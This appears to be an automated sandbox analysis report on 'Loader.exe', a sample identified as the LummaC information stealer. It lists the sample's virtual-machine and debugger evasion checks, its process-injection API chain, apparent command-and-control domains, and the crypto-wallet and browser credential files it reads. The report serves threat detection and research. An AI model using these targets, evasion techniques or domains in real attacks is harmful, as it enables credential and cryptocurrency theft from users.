Source: Loader.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: Loader.exe

Static PE information: Section: .bss ZLIB complexity 1.0003249845551894

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@4/1@1/1

Source: C:\Users\user\Desktop\Loader.exe

Code function: 3_2_004387D0 RtlExpandEnvironmentStrings,CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,GetVolumeInformationW,

3_2_004387D0

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4440:120:WilError_03

Source: Loader.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\Loader.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: Loader.exe, 00000003.00000003.2075933403.00000000052DA000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2098464912.00000000052D8000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2075806185.00000000052F7000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: Loader.exe

Virustotal: Detection: 40%

Source: C:\Users\user\Desktop\Loader.exe

File read: C:\Users\user\Desktop\Loader.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\Loader.exe "C:\Users\user\Desktop\Loader.exe"
Source: C:\Users\user\Desktop\Loader.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Loader.exe	Process created: C:\Users\user\Desktop\Loader.exe "C:\Users\user\Desktop\Loader.exe"
Source: C:\Users\user\Desktop\Loader.exe	Process created: C:\Users\user\Desktop\Loader.exe "C:\Users\user\Desktop\Loader.exe"	Jump to behavior

Source: C:\Users\user\Desktop\Loader.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior

Source: Loader.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: Loader.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: Loader.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: Loader.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: Loader.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: Loader.exe

Static PE information: real checksum: 0x97a45 should be: 0x91f35

Source: C:\Users\user\Desktop\Loader.exe	Code function: 0_2_00A9D0B9 push ecx; retf	0_2_00A9D0D2
Source: C:\Users\user\Desktop\Loader.exe	Code function: 0_2_00A9D0D3 push ecx; retf	0_2_00A9D0DE
Source: C:\Users\user\Desktop\Loader.exe	Code function: 0_2_00A6FB83 push ecx; ret	0_2_00A6FB96
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_004488E1 push edi; ret	3_2_004488E3
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_0043F2F0 push eax; mov dword ptr [esp], F5F4FB8Ah	3_2_0043F2F2
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_00A6FB83 push ecx; ret	3_2_00A6FB96

Source: C:\Users\user\Desktop\Loader.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate			Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot			Jump to behavior

Source: C:\Users\user\Desktop\Loader.exe

Process information set: NOOPENFILEERRORBOX

Jump to behavior

Malware Analysis System Evasion

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Users\user\Desktop\Loader.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController

Query firmware table information (likely to detect VMs)

Source: C:\Users\user\Desktop\Loader.exe

System information queried: FirmwareTableInformation

Jump to behavior

Source: C:\Users\user\Desktop\Loader.exe

Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes

graph_0-21193

Source: C:\Users\user\Desktop\Loader.exe

API coverage: 9.1 %

Source: C:\Users\user\Desktop\Loader.exe TID: 5592	Thread sleep time: -180000s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe TID: 5728	Thread sleep time: -30000s >= -30000s			Jump to behavior

Source: C:\Users\user\Desktop\Loader.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Source: C:\Users\user\Desktop\Loader.exe	Code function: 0_2_00A81FE9 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	0_2_00A81FE9
Source: C:\Users\user\Desktop\Loader.exe	Code function: 0_2_00A81F38 FindFirstFileExW,	0_2_00A81F38
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_00A81FE9 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	3_2_00A81FE9
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_00A81F38 FindFirstFileExW,	3_2_00A81F38

Source: Loader.exe, 00000003.00000003.2098200277.0000000005300000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: Loader.exe, 00000003.00000003.2074388190.0000000002C17000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2234117510.0000000002C17000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000002.2234989193.0000000002C17000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2149819598.0000000002C17000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2171055409.0000000002C17000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2150289757.0000000002C17000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW<
Source: Loader.exe, 00000003.00000003.2098200277.0000000005300000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696428655f
Source: Loader.exe, 00000003.00000003.2098200277.0000000005300000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: Loader.exe, 00000003.00000003.2098200277.0000000005300000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: Loader.exe, 00000003.00000003.2098200277.0000000005300000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696428655
Source: Loader.exe, 00000003.00000003.2098036172.0000000005374000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: - GDCDYNVMware20,11696428655p
Source: Loader.exe, 00000003.00000003.2098200277.0000000005300000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: Loader.exe, 00000003.00000003.2074388190.0000000002C17000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2234117510.0000000002C17000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000002.2234989193.0000000002C17000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000002.2234878448.0000000002BDC000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2149819598.0000000002C17000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2233872886.0000000002BDC000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2171055409.0000000002C17000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2150289757.0000000002C17000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Loader.exe, 00000003.00000003.2098200277.0000000005300000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: Loader.exe, 00000003.00000003.2098200277.0000000005300000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: Loader.exe, 00000003.00000003.2098200277.0000000005300000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: Loader.exe, 00000003.00000003.2098200277.0000000005300000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696428655\|UE
Source: Loader.exe, 00000003.00000003.2098200277.0000000005300000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: Loader.exe, 00000003.00000003.2098200277.0000000005300000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: Loader.exe, 00000003.00000003.2098200277.0000000005300000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: Loader.exe, 00000003.00000003.2098200277.0000000005300000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: Loader.exe, 00000003.00000003.2098200277.0000000005300000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: Loader.exe, 00000003.00000003.2098200277.0000000005300000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: Loader.exe, 00000003.00000003.2098200277.0000000005300000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696428655s
Source: Loader.exe, 00000003.00000003.2098200277.0000000005300000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: Loader.exe, 00000003.00000003.2098200277.0000000005300000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: Loader.exe, 00000003.00000003.2098200277.0000000005300000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696428655
Source: Loader.exe, 00000003.00000003.2098200277.0000000005300000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696428655o
Source: Loader.exe, 00000003.00000003.2098200277.0000000005300000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: Loader.exe, 00000003.00000003.2098200277.0000000005300000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: Loader.exe, 00000003.00000003.2098200277.0000000005300000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: Loader.exe, 00000003.00000003.2098200277.0000000005300000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: Loader.exe, 00000003.00000003.2098200277.0000000005300000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696428655j
Source: Loader.exe, 00000003.00000003.2098200277.0000000005300000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: Loader.exe, 00000003.00000003.2098036172.0000000005374000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: YNVMware
Source: Loader.exe, 00000003.00000003.2098200277.0000000005300000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: Loader.exe, 00000003.00000003.2098200277.0000000005300000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: Loader.exe, 00000003.00000003.2098200277.0000000005300000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: Loader.exe, 00000003.00000003.2098200277.0000000005300000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655

Source: C:\Users\user\Desktop\Loader.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\Loader.exe

Code function: 3_2_0043DA10 LdrInitializeThunk,

3_2_0043DA10

Source: C:\Users\user\Desktop\Loader.exe

Code function: 0_2_00A6F8E9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_00A6F8E9

Source: C:\Users\user\Desktop\Loader.exe	Code function: 0_2_00A9A19E mov edi, dword ptr fs:[00000030h]	0_2_00A9A19E
Source: C:\Users\user\Desktop\Loader.exe	Code function: 0_2_00A61FB0 mov edi, dword ptr fs:[00000030h]	0_2_00A61FB0
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_00A61FB0 mov edi, dword ptr fs:[00000030h]	3_2_00A61FB0

Source: C:\Users\user\Desktop\Loader.exe

Code function: 0_2_00A7D8E0 GetProcessHeap,

0_2_00A7D8E0

Source: C:\Users\user\Desktop\Loader.exe	Code function: 0_2_00A6F52D SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00A6F52D
Source: C:\Users\user\Desktop\Loader.exe	Code function: 0_2_00A6F8E9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00A6F8E9
Source: C:\Users\user\Desktop\Loader.exe	Code function: 0_2_00A6F8DD SetUnhandledExceptionFilter,	0_2_00A6F8DD
Source: C:\Users\user\Desktop\Loader.exe	Code function: 0_2_00A77E30 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00A77E30
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_00A6F52D SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	3_2_00A6F52D
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_00A6F8E9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	3_2_00A6F8E9
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_00A6F8DD SetUnhandledExceptionFilter,	3_2_00A6F8DD
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_00A77E30 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	3_2_00A77E30

HIPS / PFW / Operating System Protection Evasion

Contains functionality to inject code into remote processes

Source: C:\Users\user\Desktop\Loader.exe

Code function: 0_2_00A9A19E GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessW,CreateProcessW,VirtualAlloc,VirtualAlloc,GetThreadContext,Wow64GetThreadContext,ReadProcessMemory,ReadProcessMemory,VirtualAllocEx,VirtualAllocEx,GetProcAddress,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,Wow64SetThreadContext,ResumeThread,ResumeThread,

0_2_00A9A19E

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\Loader.exe

Memory written: C:\Users\user\Desktop\Loader.exe base: 400000 value starts with: 4D5A

Jump to behavior

LummaC encrypted strings found

Source: Loader.exe, 00000000.00000002.2027723565.0000000004642000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: hummskitnj.buzz
Source: Loader.exe, 00000000.00000002.2027723565.0000000004642000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: cashfuzysao.buzz
Source: Loader.exe, 00000000.00000002.2027723565.0000000004642000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: appliacnesot.buzz
Source: Loader.exe, 00000000.00000002.2027723565.0000000004642000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: screwamusresz.buzz
Source: Loader.exe, 00000000.00000002.2027723565.0000000004642000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: inherineau.buzz
Source: Loader.exe, 00000000.00000002.2027723565.0000000004642000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: scentniej.buzz
Source: Loader.exe, 00000000.00000002.2027723565.0000000004642000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: rebuildeso.buzz
Source: Loader.exe, 00000000.00000002.2027723565.0000000004642000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: prisonyfork.buzz
Source: Loader.exe, 00000000.00000002.2027723565.0000000004642000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: cureprouderio.click

Source: C:\Users\user\Desktop\Loader.exe

Process created: C:\Users\user\Desktop\Loader.exe "C:\Users\user\Desktop\Loader.exe"

Jump to behavior

Source: C:\Users\user\Desktop\Loader.exe	Code function: EnumSystemLocalesW,	0_2_00A7D1BD
Source: C:\Users\user\Desktop\Loader.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	0_2_00A81287
Source: C:\Users\user\Desktop\Loader.exe	Code function: EnumSystemLocalesW,	0_2_00A814D8
Source: C:\Users\user\Desktop\Loader.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	0_2_00A81580
Source: C:\Users\user\Desktop\Loader.exe	Code function: EnumSystemLocalesW,	0_2_00A817D3
Source: C:\Users\user\Desktop\Loader.exe	Code function: GetLocaleInfoW,	0_2_00A81840
Source: C:\Users\user\Desktop\Loader.exe	Code function: EnumSystemLocalesW,	0_2_00A81915
Source: C:\Users\user\Desktop\Loader.exe	Code function: GetLocaleInfoW,	0_2_00A81960
Source: C:\Users\user\Desktop\Loader.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	0_2_00A81A07
Source: C:\Users\user\Desktop\Loader.exe	Code function: GetLocaleInfoW,	0_2_00A81B0D
Source: C:\Users\user\Desktop\Loader.exe	Code function: GetLocaleInfoW,	0_2_00A7CC15
Source: C:\Users\user\Desktop\Loader.exe	Code function: EnumSystemLocalesW,	3_2_00A7D1BD
Source: C:\Users\user\Desktop\Loader.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	3_2_00A81287
Source: C:\Users\user\Desktop\Loader.exe	Code function: EnumSystemLocalesW,	3_2_00A814D8
Source: C:\Users\user\Desktop\Loader.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	3_2_00A81580
Source: C:\Users\user\Desktop\Loader.exe	Code function: EnumSystemLocalesW,	3_2_00A817D3
Source: C:\Users\user\Desktop\Loader.exe	Code function: GetLocaleInfoW,	3_2_00A81840
Source: C:\Users\user\Desktop\Loader.exe	Code function: EnumSystemLocalesW,	3_2_00A81915
Source: C:\Users\user\Desktop\Loader.exe	Code function: GetLocaleInfoW,	3_2_00A81960
Source: C:\Users\user\Desktop\Loader.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	3_2_00A81A07
Source: C:\Users\user\Desktop\Loader.exe	Code function: GetLocaleInfoW,	3_2_00A81B0D
Source: C:\Users\user\Desktop\Loader.exe	Code function: GetLocaleInfoW,	3_2_00A7CC15

Source: C:\Users\user\Desktop\Loader.exe

Queries volume information: C:\ VolumeInformation

Jump to behavior

Source: C:\Users\user\Desktop\Loader.exe

Code function: 0_2_00A700B4 GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime,GetSystemTimeAsFileTime,

0_2_00A700B4

Source: C:\Users\user\Desktop\Loader.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: Loader.exe, 00000003.00000003.2176731484.0000000005353000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Users\user\Desktop\Loader.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: Loader.exe PID: 5396, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: Loader.exe, 00000003.00000003.2149819598.0000000002BF3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/Electrum
Source: Loader.exe, 00000003.00000003.2149819598.0000000002BF3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/ElectronCash
Source: Loader.exe, 00000003.00000003.2150289757.0000000002BED000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\com.liberty.jaxx\IndexedDB
Source: Loader.exe, 00000003.00000003.2149819598.0000000002BF3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: window-state.json
Source: Loader.exe, 00000003.00000003.2149819598.0000000002C17000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Exodus\exodus.wallet
Source: Loader.exe, 00000003.00000003.2149450871.0000000002C74000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/Exodus
Source: Loader.exe, 00000003.00000003.2149819598.0000000002BF3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Ethereum
Source: Loader.exe, 00000003.00000003.2150289757.0000000002BED000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
Source: Loader.exe, 00000003.00000003.2149450871.0000000002C74000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: keystore

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cert9.db	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd	Jump to behavior
